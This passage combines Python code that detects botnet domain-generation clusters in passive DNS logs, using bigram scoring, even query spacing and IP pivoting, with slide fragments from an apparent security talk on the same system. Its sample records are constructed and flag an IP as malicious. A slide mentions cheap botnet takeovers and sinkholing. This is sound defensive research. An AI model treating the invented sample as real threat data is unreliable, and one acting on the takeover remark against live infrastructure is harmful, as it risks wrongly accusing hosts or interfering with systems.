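    return (labels[-1], len(labels), min(len(qname) // 10, 4))


def bigram_score(label: str) -> float:
    """Fraction of the label's bigrams that are common English bigrams;
    generated strings score low, dictionary-like labels score high."""
    pairs = [label[i:i + 2] for i in range(len(label) - 1)]
    return sum(p in COMMON_BIGRAMS for p in pairs) / len(pairs) if pairs else 0.0


def evenly_spaced(timestamps, min_count: int = 4, max_cv: float = 0.5) -> bool:
    """True when at least min_count queries arrive with a steady inter-query
    gap (coefficient of variation of the gaps at most max_cv)."""
    ts = sorted(timestamps)
    if len(ts) < min_count:
        return False
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    m = mean(gaps)
    return m > 0 and pstdev(gaps) / m <= max_cv


def find_dga_clusters(records, max_score: float = 0.5):
    """Failed lookups -> group by f -> even distribution -> other members
    with the same key -> their IPs."""
    failed = defaultdict(list)
    for r in records:
        if r.rcode in (NXDOMAIN, SERVFAIL) and bigram_score(r.qname.split(".")[0]) <= max_score:
            failed[cluster_key(r.qname)].append(r)
    clusters = {}
    for key, recs in failed.items():
        if not evenly_spaced([r.ts for r in recs]):
            continue
        resolved = {r.qname: r.answer for r in records
                    if r.rcode == 0 and cluster_key(r.qname) == key}
        clusters[key] = {"failed": sorted({r.qname for r in recs}),
                         "resolved": resolved,
                         "ips": sorted(set(resolved.values()))}
    return clusters


def domains_for_ip(records, ip: str):
    """The 'rinse and repeat' pivot: every name seen resolving to ip."""
    return sorted({r.qname for r in records if r.rcode == 0 and r.answer == ip})


# Constructed passive-DNS sample: a bot querying one generated name per
# minute, the one name that was registered, a second name on the same IP,
# and some benign NXDOMAIN noise (timestamps in seconds).
SAMPLE = [
    Record(0, "gidzzkc.dogbookeoor-amtuzxo.org", NXDOMAIN, None),
    Record(60, "yqvdmbul.dogbookeoor-amtuzxo.org", NXDOMAIN, None),
    Record(120, "fncalzrmx.dogbookeoor-amtuzxo.org", NXDOMAIN, None),
    Record(180, "xkqvzrt.dogbookeoor-amtuzxo.org", SERVFAIL, None),
    Record(240, "pzwvkqm.dogbookeoor-amtuzxo.org", NXDOMAIN, None),
    Record(300, "ghyyaweczb.dogbookeoor-amtuzxo.org", 0, "91.220.84.7"),
    Record(400, "owcfudqq.video-zgn-gqmbcax.info", 0, "91.220.84.7"),
    Record(17, "avatarmaker.eu", NXDOMAIN, None),
    Record(33, "typo.example.com", NXDOMAIN, None),
    Record(50, "www.example.com", 0, "192.0.2.1"),
    Record(3000, "wwww.example.com", NXDOMAIN, None),
]

if __name__ == "__main__":
    for key, info in find_dga_clusters(SAMPLE).items():
        print(key, len(info["failed"]), "failed members, IPs", info["ips"])
        for ip in info["ips"]:
            print("  ", ip, "->", domains_for_ip(SAMPLE, ip))
```

The bigram score is what keeps avatarmaker.eu out of the failed-lookup pool before any WHOIS or IP cross-check is needed, and the even-spacing test is what separates a bot's steady stream of failures from the bursty typos of ordinary users; both thresholds would be tuned against the deployment's own traffic.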
77
Automation
78
Performance
● On a single machine (32 GB RAM) we run up to 2000 pkt/sec without significant performance loss
● Average load:
79
Other Interesting numbers
● Packets per day: ~130M filtered.
● Mal. domains/day: ~30k DNS queries (varies)
● Avg. 30-50 req/minute for a single domain
80
Uses of the data
● Obvious: blacklists
● Botnet takeovers (costs 11 USD or less ;)
● Sinkholing
81
Demotime :)
● (demos, let's look at some videos :)
82
Questions?
@fygrave @vbkropotov
83
Feedback: @fygrave
@vbkropotov (also @ gmail.com)
Code:
https://github.com/fygrave/dnslyzer.git